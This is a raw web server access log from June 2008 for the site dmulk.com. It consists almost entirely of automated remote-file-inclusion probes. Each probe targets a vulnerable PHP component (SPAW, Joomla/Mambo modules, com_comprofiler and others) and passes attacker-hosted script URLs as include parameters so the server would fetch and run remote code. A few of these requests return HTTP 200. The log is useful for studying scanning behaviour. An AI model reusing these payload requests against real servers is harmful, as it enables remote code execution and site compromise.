217.22.228.144 - - [09/Jun/2008:09:30:16 -0700] "GET /logs//errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:09:30:16 -0700] "GET /logs/access_071218.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:09:30:17 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:09:30:17 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.162.238.35 - - [09/Jun/2008:09:30:21 -0700] "GET /logs/access_080215.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.patrioticusa.us/poll/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.162.238.35 - - [09/Jun/2008:09:30:21 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.patrioticusa.us/poll/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.162.238.35 - - [09/Jun/2008:09:30:22 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.patrioticusa.us/poll/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.75.193.70 - - [09/Jun/2008:09:30:36 -0700] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.189.26.170 - - [09/Jun/2008:09:30:44 -0700] "GET /logs/access_071218.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.189.26.170 - - [09/Jun/2008:09:30:45 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.189.26.170 - - [09/Jun/2008:09:30:45 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
71.39.214.250 - - [09/Jun/2008:09:30:47 -0700] "GET /logs/access_080303.log/index.php?canal=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
71.39.214.250 - - [09/Jun/2008:09:30:47 -0700] "GET /logs/access_080303.log/errors.php?error=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
208.78.243.180 - - [09/Jun/2008:09:30:48 -0700] "GET /logs/access_071225.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.78.243.180 - - [09/Jun/2008:09:30:48 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.78.243.180 - - [09/Jun/2008:09:30:48 -0700] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.78.243.180 - - [09/Jun/2008:09:30:48 -0700] "GET /logs/access_071225.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.78.243.180 - - [09/Jun/2008:09:30:49 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.78.243.180 - - [09/Jun/2008:09:30:49 -0700] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
71.39.214.250 - - [09/Jun/2008:09:30:49 -0700] "GET /index.php?canal=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 200 16871 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
71.39.214.250 - - [09/Jun/2008:09:30:49 -0700] "GET /errors.php?error=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
71.39.214.250 - - [09/Jun/2008:09:30:50 -0700] "GET /logs/index.php?canal=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
71.39.214.250 - - [09/Jun/2008:09:30:50 -0700] "GET /logs/errors.php?error=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
71.39.214.250 - - [09/Jun/2008:09:30:52 -0700] "GET /logs/access_080322.log/index.php?canal=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
71.39.214.250 - - [09/Jun/2008:09:30:53 -0700] "GET /logs/access_080322.log/errors.php?error=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
69.57.142.40 - - [09/Jun/2008:09:31:07 -0700] "GET /logs/access_071225.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.57.142.40 - - [09/Jun/2008:09:31:07 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.57.142.40 - - [09/Jun/2008:09:31:07 -0700] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.136.58.116 - - [09/Jun/2008:09:31:47 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.avedila.com/avedila/.../peler.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:09:31:48 -0700] "GET /logs/access_071224.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.194.149.215 - - [09/Jun/2008:09:31:52 -0700] "GET /logs/access_071229.log/cyberfolio/portfolio/msg/view.php?av=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.194.149.215 - - [09/Jun/2008:09:31:52 -0700] "GET /logs/cyberfolio/portfolio/msg/view.php?av=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.194.149.215 - - [09/Jun/2008:09:31:52 -0700] "GET /cyberfolio/portfolio/msg/view.php?av=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.194.149.215 - - [09/Jun/2008:09:31:54 -0700] "GET /logs/access_080121.log/cyberfolio/portfolio/msg/view.php?av=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:09:32:04 -0700] "GET /logs/access_071218.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:09:32:05 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:09:32:05 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
159.148.95.29 - - [09/Jun/2008:09:32:23 -0700] "GET /logs/access_080201.log/index.php?pagina=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
159.148.95.29 - - [09/Jun/2008:09:32:25 -0700] "GET /index.php?pagina=http://www.venezia2.it/coges.txt?? HTTP/1.1" 200 16819 "-" "libwww-perl/5.803" "www.dmulk.com"
159.148.95.29 - - [09/Jun/2008:09:32:26 -0700] "GET /logs/index.php?pagina=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.217.240 - - [09/Jun/2008:09:32:43 -0700] "GET /logs//administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.217.240 - - [09/Jun/2008:09:32:44 -0700] "GET //administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.136.58.116 - - [09/Jun/2008:09:32:46 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.136.58.116 - - [09/Jun/2008:09:32:46 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.136.58.116 - - [09/Jun/2008:09:32:48 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.119 - - [09/Jun/2008:09:32:55 -0700] "GET /logs/access.log/bookmark4u/lostpasswd.php?env[include_prefix]=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.92.85.12 - - [09/Jun/2008:09:33:03 -0700] "GET /logs/classes/phpmailer/class.cs_phpmailer.php?classes_dir=http://h1.ripway.com/the0nlyhills/ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.92.85.12 - - [09/Jun/2008:09:33:04 -0700] "GET /classes/phpmailer/class.cs_phpmailer.php?classes_dir=http://h1.ripway.com/the0nlyhills/ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
210.48.67.39 - - [09/Jun/2008:09:33:04 -0700] "GET /logs/access_080429.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:09:33:06 -0700] "GET /logs/access_080223.log//errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
159.148.95.29 - - [09/Jun/2008:09:33:17 -0700] "GET /logs/access.log/index.php?pagina=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.171.91.82 - - [09/Jun/2008:09:33:21 -0700] "GET /logs/access_071224.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://h1.ripway.com/lowryder08/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.189.26.170 - - [09/Jun/2008:09:33:23 -0700] "GET /logs/access_080228.log//errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.189.26.170 - - [09/Jun/2008:09:33:23 -0700] "GET /logs/access_071224.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.189.26.170 - - [09/Jun/2008:09:33:26 -0700] "GET /logs/access_080228.log//errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.189.26.170 - - [09/Jun/2008:09:33:26 -0700] "GET //errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.189.26.170 - - [09/Jun/2008:09:33:26 -0700] "GET /logs//errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.169.129.21 - - [09/Jun/2008:09:33:37 -0700] "GET /index.php?x=http://europe-souvenirs.com/shop/templates_c/id.txt??? HTTP/1.1" 200 16861 "-" "libwww-perl/5.805" "www.dmulk.com"
211.189.26.170 - - [09/Jun/2008:09:34:01 -0700] "GET /logs/access_080312.log//errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:09:34:17 -0700] "GET /logs//errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:09:34:18 -0700] "GET //errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.194.149.215 - - [09/Jun/2008:09:34:25 -0700] "GET /logs/access_080124.log/cyberfolio/portfolio/msg/view.php?av=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.22.129 - - [09/Jun/2008:09:34:47 -0700] "GET /logs/access.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://4wdnews.com.au/files/tol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
62.233.130.174 - - [09/Jun/2008:09:34:49 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.233.130.174 - - [09/Jun/2008:09:34:50 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.infostec.net/ids/TT??? HTTP/1.1" 200 50 "-" "libwww-perl/5.805" "www.dmulk.com"
62.233.130.174 - - [09/Jun/2008:09:34:50 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.92.85.12 - - [09/Jun/2008:09:34:56 -0700] "GET /logs/includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=http://h1.ripway.com/the0nlyhills/ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.92.85.12 - - [09/Jun/2008:09:34:56 -0700] "GET /includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=http://h1.ripway.com/the0nlyhills/ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:09:35:05 -0700] "GET /logs/access_080228.log//errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.235.34.216 - - [09/Jun/2008:09:35:39 -0700] "GET /logs/access_080201.log//modules/TotalCalendar/about.php?inc_dir=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.235.34.216 - - [09/Jun/2008:09:35:40 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.235.34.216 - - [09/Jun/2008:09:35:40 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.12.149.44 - - [09/Jun/2008:09:35:46 -0700] "GET //include/lib.inc.php?site_path=http://?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
208.71.170.173 - - [09/Jun/2008:09:36:10 -0700] "GET /logs/access_080127.log/index1.php?menu=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.71.170.173 - - [09/Jun/2008:09:36:10 -0700] "GET /index1.php?menu=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.71.170.173 - - [09/Jun/2008:09:36:10 -0700] "GET /logs/index1.php?menu=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.71.170.173 - - [09/Jun/2008:09:36:12 -0700] "GET /logs/access_080207.log/index1.php?choix=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.71.170.173 - - [09/Jun/2008:09:36:12 -0700] "GET /index1.php?choix=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.71.170.173 - - [09/Jun/2008:09:36:12 -0700] "GET /logs/index1.php?choix=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.249.67.79 - - [09/Jun/2008:09:36:15 -0700] "GET /blog/index.php/2008/06/05/crestoc-2008-5302008-612008/?show=slide&nggpage=2 HTTP/1.1" 200 7921 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "dmulk.com"
220.162.238.35 - - [09/Jun/2008:09:36:17 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.patrioticusa.us/poll/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.71.170.173 - - [09/Jun/2008:09:36:19 -0700] "GET /logs/access_080207.log/index1.php?menu=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.71.170.173 - - [09/Jun/2008:09:36:25 -0700] "GET /logs/access_080122.log/index1.php?choix=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.233.130.174 - - [09/Jun/2008:09:36:40 -0700] "GET /logs/access_080215.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.189.26.170 - - [09/Jun/2008:09:36:48 -0700] "GET /logs/access_071218.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.189.26.170 - - [09/Jun/2008:09:36:48 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.189.26.170 - - [09/Jun/2008:09:36:49 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.136.58.116 - - [09/Jun/2008:09:36:49 -0700] "GET /logs/access_071218.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.avedila.com/avedila/.../ngalbaa.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.136.58.116 - - [09/Jun/2008:09:36:49 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.avedila.com/avedila/.../ngalbaa.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:09:37:00 -0700] "GET /logs/access_080215.log//admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.58.163.166 - - [09/Jun/2008:09:37:01 -0700] "GET /logs//db/txt.inc.php?file=[file]&check=0&comment=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.6.235.230 - - [09/Jun/2008:09:37:11 -0700] "GET /logs//errors.php?error=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.6.235.230 - - [09/Jun/2008:09:37:12 -0700] "GET /logs/access_080220.log//errors.php?error=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.6.235.230 - - [09/Jun/2008:09:37:12 -0700] "GET //errors.php?error=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.111.96.242 - - [09/Jun/2008:09:37:12 -0700] "GET /logs/access_071218.log HTTP/1.1" 200 141071 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;1813)" "www.dmulk.com"
216.6.235.230 - - [09/Jun/2008:09:37:20 -0700] "GET /logs/access_080103.log//errors.php?error=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.111.96.242 - - [09/Jun/2008:09:37:25 -0700] "GET /logs/access_071218.log HTTP/1.1" 200 141071 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;1813)" "www.dmulk.com"
209.164.178.158 - - [09/Jun/2008:09:37:39 -0700] "GET /logs/access_080220.log//errors.php?error=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.164.178.158 - - [09/Jun/2008:09:37:39 -0700] "GET //errors.php?error=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.164.178.158 - - [09/Jun/2008:09:37:39 -0700] "GET /logs//errors.php?error=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.164.178.158 - - [09/Jun/2008:09:37:39 -0700] "GET /logs/access_080103.log//errors.php?error=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.235.34.216 - - [09/Jun/2008:09:37:56 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.92.85.12 - - [09/Jun/2008:09:37:59 -0700] "GET /logs/access_080215.log//customer/product.php?xcart_dir=http://h1.ripway.com/the0nlyhills/ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.92.85.12 - - [09/Jun/2008:09:37:59 -0700] "GET //customer/product.php?xcart_dir=http://h1.ripway.com/the0nlyhills/ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.224.129.124 - - [09/Jun/2008:09:37:59 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.92.85.12 - - [09/Jun/2008:09:37:59 -0700] "GET /logs//customer/product.php?xcart_dir=http://h1.ripway.com/the0nlyhills/ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.224.129.124 - - [09/Jun/2008:09:37:59 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:09:38:15 -0700] "GET /logs/access_080312.log//admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:09:38:16 -0700] "GET //admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:09:38:16 -0700] "GET /logs//admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.136.58.116 - - [09/Jun/2008:09:38:19 -0700] "GET /logs/access_071224.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.avedila.com/avedila/.../ngalbaa.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.58.163.166 - - [09/Jun/2008:09:38:28 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.58.163.166 - - [09/Jun/2008:09:38:40 -0700] "GET /logs/access.log//modules/4nAlbum/public/displayCategory.php?basepath=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.58.163.166 - - [09/Jun/2008:09:38:40 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.58.163.166 - - [09/Jun/2008:09:38:43 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
211.224.129.124 - - [09/Jun/2008:09:38:45 -0700] "GET /logs/access_080310.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.68.16.126 - - [09/Jun/2008:09:38:52 -0700] "GET /blog/wp-content/uploads/mvi_0037.avi HTTP/1.1" 200 9261848 "http://www.st-owners.com/forums/showthread.php?t=42712" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
